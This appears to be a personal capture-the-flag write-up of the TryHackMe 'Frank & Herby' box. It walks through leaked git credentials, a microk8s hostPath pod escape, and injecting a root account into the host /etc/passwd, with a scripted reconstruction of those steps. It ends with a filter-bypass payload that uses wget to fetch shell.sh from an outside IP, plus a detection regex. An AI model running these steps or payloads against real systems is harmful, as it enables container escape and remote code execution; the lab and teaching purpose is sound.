THM: Frank & Herby
It’s been a month; really. What have I been doing in all this time? Stuff, but nothing worth noting. I’ve done some VulnHub boxes, some RootMe stuff, a bit of THM and a few other things but nothing worth making any particular notes about. But, this one was a bit more novel so here goes. This is Frank & Herby make an app, which is Medium rated.
We get a few clues in the description and questions:
Learn how the misconfiguration of containers can lead to opportunities for some and disasters for others.
Containers are really cool, but they have security considerations just like everything else. Break into the box and then figure out how to get root access!
This box will require some research into how to use microk8s.
Our story so far….
Two developers are venturing into the world of Kubernetes. Little do these developers know that their lack of understanding in ‘k8s’, containers, and git has left their resources open to exploitation!
And the questions?
- What port has a webpage frank was able to stand up?
- What did frank leave exposed on the site?
- What is the user.txt flag?
- What is the root.txt flag?
Wow, we’ve got a bit to unpack here. We know we’re looking for something on a website, and we’ll be playing with Kubernetes, which I know very little about.
We’ll skip over the first part, because frankly it’s not that interesting. The file we want is .git-credentials, served by a website on port 31337, which I found very easily with some enumeration. The credentials inside .git-credentials are URL-encoded, but once decoded we have frank’s password and can SSH in.
To start with I blundered about in the dark, but eventually I figured this out. Rather than outline my mistakes, I’ll cut to the chase. We can list the pods with microk8s.kubectl get pods -A:
NAMESPACE | NAME | READY | STATUS | RESTARTS | AGE |
---|---|---|---|---|---|
container-registry | registry-9b57d9df8-2qbbs | 1/1 | Running | 8 | 34d |
kube-system | hostpath-provisioner-5c65fbdb4f-29k5w | 1/1 | Running | 8 | 34d |
default | nginx-deployment-7b548976fd-77v4r | 1/1 | Running | 2 | 10d |
kube-system | coredns-7f9c69c78c-hpsnw | 1/1 | Running | 7 | 34d |
kube-system | calico-node-6595k | 1/1 | Running | 8 | 34d |
kube-system | calico-kube-controllers-f7868dd95-xkk4w | 1/1 | Running | 8 | 34d |
So essentially only one container is of interest: nginx. This article describes the technique we’re going to use: create a new pod whose manifest mounts the node’s filesystem into the container with a hostPath volume. We need to edit or create a yaml file; I chose to start with the existing one that was used to deploy the pod in the first place. As it happens, it’s this one:
We can pretty much use the example provided at the link above, except that the image name is nginx and we have to provide the IP/port per the original test.yaml (which I copied to old.yaml). I could show it here but I forgot to cat the files before the box closed, so you’ll have to take my word for it. The reason we can’t just use:
image: ubuntu:latest
from the provided example is that it would try to pull the image from an online registry, and the box doesn’t have an internet connection. We might be able to host an image ourselves….hmmm. The nginx image is already present on the node because the existing deployment runs it, so we can use that one just fine. Next we do:
And if we re-run
microk8s.kubectl get pods -A
we have a new pod in addition to the other ones:
NAMESPACE | NAME | READY | STATUS | RESTARTS | AGE |
---|---|---|---|---|---|
default | hostmount | 1/1 | Running | 0 | 4m6s |
Goodo. Next it’s:
or some variation thereof; the example from the article:
microk8s.kubectl exec -it hostmount /bin/bash
does not work; kubectl now wants a -- separator between the pod name and the command it should run.
This one does though:
microk8s.kubectl exec -it hostmount -- /bin/bash
Syntax eh.
Once we are there, we can go to /opt/root and find the host’s root filesystem; I add good old root2 to the host’s /etc/passwd:
Note! Pay close attention to the directory I was in: root@hostmount:/opt/root/etc. Going to /etc will not work, because that is the container’s own /etc and not the host’s, which is mounted under /opt/root. Anyway this was interesting, which is why I’m recording it here.
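Since the original test.yaml never made it into the write-up, here is the whole escape as an added example: a hostPath pod manifest, the microk8s.kubectl commands around it, and the passwd line for the new root user. This is my reconstruction, not the author’s file; the pod name hostmount, the mount point /opt/root, the account name root2 and the password hash placeholder are assumptions. The script only generates text and prints the commands, so it runs without a cluster.

```shell
#!/bin/sh
# Added example (not the author's test.yaml): hostPath escape on microk8s.
# Assumed: pod name "hostmount", mount point /opt/root, account "root2".

# Emit a pod manifest that mounts the node's root filesystem into the
# container. The image must already be cached on the node (no internet
# on the box); nginx is, because the existing deployment runs it.
hostmount_manifest() {
    image="$1"; mountpath="$2"
    cat <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: hostmount
    image: ${image}
    # Use the cached image, never try to pull.
    imagePullPolicy: IfNotPresent
    volumeMounts:
    - name: host
      mountPath: ${mountpath}
  volumes:
  - name: host
    hostPath:
      # The node's root filesystem, exposed at mountPath inside the pod.
      path: /
      type: Directory
EOF
}

# passwd line for a second UID 0 account. The hash is passed in as an
# argument (placeholder in tests); make a real one with: openssl passwd -6
root_passwd_entry() {
    name="$1"; pwhash="$2"
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$name" "$pwhash"
}

# The passwd file to edit is the one under the hostPath mount, not the
# container's own /etc/passwd (the trap noted in the write-up).
host_passwd_path() {
    mountpath="$1"
    printf '%s/etc/passwd\n' "${mountpath%/}"
}

# Print the full sequence for the target; printed rather than executed so
# the script is usable offline and the reader can review each step.
run_escape() {
    image="$1"; mountpath="$2"; name="$3"; pwhash="$4"
    echo "# 1. write the manifest"
    echo "hostmount_manifest $image $mountpath > hostmount.yaml"
    echo "# 2. create the pod and confirm it is Running"
    echo "microk8s.kubectl apply -f hostmount.yaml"
    echo "microk8s.kubectl get pods -A"
    echo "# 3. shell in (note the -- before the command)"
    echo "microk8s.kubectl exec -it hostmount -- /bin/bash"
    echo "# 4. inside the pod: append to the HOST passwd, then switch user"
    echo "echo '$(root_passwd_entry "$name" "$pwhash")' >> $(host_passwd_path "$mountpath")"
    echo "su $name"
}

run_escape nginx /opt/root root2 'REPLACE_WITH_HASH'
```

The manifest is the weak setting in this story: any user who can create pods with a hostPath volume of / owns the node, which is why hostPath should be denied by admission policy unless a workload genuinely needs it.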
Also I did Minotaur’s Labyrinth but there wasn’t anything too novel there, except for the fact that wget doesn’t need the http:// scheme, so a filter regex that keys on it can be defeated; maybe I’ll write it up….maybe not. The payload as it went into the request, with + for spaces:
wget+10.9.10.123/shell.sh+-O+/tmp/shell.sh
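To show why that payload works, here is an added example of a constructed, hypothetical blocklist filter of the kind the sentence above describes, alongside the decoded payload and a stricter check. The regexes are my own illustration; the actual filter on the Minotaur’s Labyrinth box is not shown on this page.

```shell
#!/bin/sh
# Added example, not from the box: a scheme-based URL filter and its bypass.

# Hypothetical blocklist: reject anything carrying an explicit scheme.
# Returns 0 (blocked) when matched, 1 when the input passes.
naive_url_filter() {
    printf '%s' "$1" | grep -Eq '(https?|ftp)://'
}

# The payload arrives with "+" for spaces (URL-encoded form); decode it
# to the command that actually runs on the target.
decode_plus() {
    printf '%s\n' "$1" | tr '+' ' '
}

# GNU wget treats a scheme-less URL as http://, so a bare host/path
# fetches exactly what the filtered form would have.
wget_effective_url() {
    case "$1" in
        *://*) printf '%s\n' "$1" ;;
        *)     printf 'http://%s\n' "$1" ;;
    esac
}

# Stricter check: match the download tools themselves and dotted-quad
# hosts, not just the scheme. Still a blocklist, so an allowlist on the
# expected input is the real fix; this just closes the gap shown here.
stricter_filter() {
    printf '%s' "$1" \
      | grep -Eq '(^|[^a-zA-Z])(wget|curl)([^a-zA-Z]|$)|(https?|ftp)://|([0-9]{1,3}\.){3}[0-9]{1,3}'
}

cmd="$(decode_plus 'wget+10.9.10.123/shell.sh+-O+/tmp/shell.sh')"
if naive_url_filter "$cmd"; then echo "naive: blocked"; else echo "naive: passed -> $cmd"; fi
if stricter_filter "$cmd"; then echo "stricter: blocked"; fi
```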